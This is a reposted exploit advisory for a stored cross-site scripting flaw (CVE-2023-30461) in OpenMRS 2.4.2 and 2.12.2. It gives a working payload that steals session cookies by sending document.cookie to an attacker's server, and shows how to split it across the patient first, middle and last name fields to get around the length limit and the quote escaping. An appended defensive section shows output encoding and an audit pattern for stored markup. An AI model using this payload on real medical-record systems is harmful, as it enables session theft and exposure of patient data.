OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerability

| CVE | Category | Price | Severity |
| --- | --- | --- | --- |
| CVE-2023-30461 | CWE-79 | Not disclosed | High |

| Author | Risk | Exploitation Type | Date |
| --- | --- | --- | --- |
| Not disclosed | High | Remote | 2023-04-10 |

CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040047

Below is a copy:

# Exploit Title: OpenMRS XSS Vulnerability in Attachments
# Date: 2023-04-09
# Exploit Author: Omar Tsai
# Vendor Homepage: https://openmrs.org/
# Software Link: https://openmrs.org/download/
# Version: 2.4.2, 2.12.2
# Tested on: OpenMRS 2.4.2, 2.12.2 Standalone
# CVE : CVE-2023-30461

# Proof-of-concept for XSS OpenMRS 2.4.2, 2.12.2

In this example, I will demonstrate a simple cookie-stealing attack using the three fields in a patient (First name, Middle name, and Last name).

## 1. Figure out the XSS payload

```html
<script>$.get(`https://<my_server>/?`+document.cookie);</script>
```

Now we have to split this into chunks of at most 50 characters, since each name field is limited to 50 characters. Note that backticks are used in place of quotes, since quotation marks are escaped in the field.

## 2. Split up the XSS payload into 3 parts

I will split the payload into 3 parts using a variable and the final jQuery request:

**For the first name:**

```html
<script>var a=`https://my-own`</script>
```

**For the middle name:**

```html
<script>a+=`-simpledomain.cp,/?`</script>
```

**For the last name:**

```html
<script>$.get(a+document.cookie);</script>
```

## 3. Save the patient information

Just click Save.

## 4. Execute XSS attack

The XSS attack can be triggered by going to the `attachments` page of the patient.

## 5. Get cookies

If you look back at your server logs, a GET request will have been initiated with the user's cookies.
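
A defender's view of the issue described above, as an added example that is not part of the original post and not OpenMRS code: the 50-character limit and quote escaping do not help when the three name parts are written into the same page without HTML encoding, so the fix is output encoding at render time, plus a sweep of stored records for markup. The function names, the record shape and the sample records are assumptions constructed for illustration.

```javascript
// Added example, not OpenMRS code; all names here are hypothetical.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that are significant in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// "Before": name parts are written into markup exactly as stored.
function renderNameUnsafe(p) {
  return `<span class="patient-name">${p.givenName} ${p.middleName} ${p.familyName}</span>`;
}

// "After": every part is encoded at output time, whatever was accepted on input.
function renderNameSafe(p) {
  const parts = [p.givenName, p.middleName, p.familyName].map(escapeHtml);
  return `<span class="patient-name">${parts.join(' ')}</span>`;
}

// Audit sweep over stored records: flag name fields holding tag-like markup
// or backticks (a heuristic; real names contain neither).
const MARKUP = /<\s*\/?\s*[a-z!][^>]*>|`/i;
function auditPatientNames(patients) {
  const findings = [];
  for (const p of patients) {
    for (const field of ['givenName', 'middleName', 'familyName']) {
      if (MARKUP.test(p[field] ?? '')) findings.push({ id: p.id, field });
    }
  }
  return findings;
}

// Constructed sample records: one ordinary name, one with markup in each field.
const SAMPLE_PATIENTS = [
  { id: 1, givenName: 'Ada', middleName: 'M.', familyName: "O'Neil" },
  { id: 2, givenName: '<script>var a=`x`</script>',
    middleName: '<script>a+=`y`</script>',
    familyName: '<script>void a</script>' },
];
```

Encoding at render time also neutralizes records that were stored before any input validation was added, which is why the audit sweep is a cleanup aid and not the fix itself.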
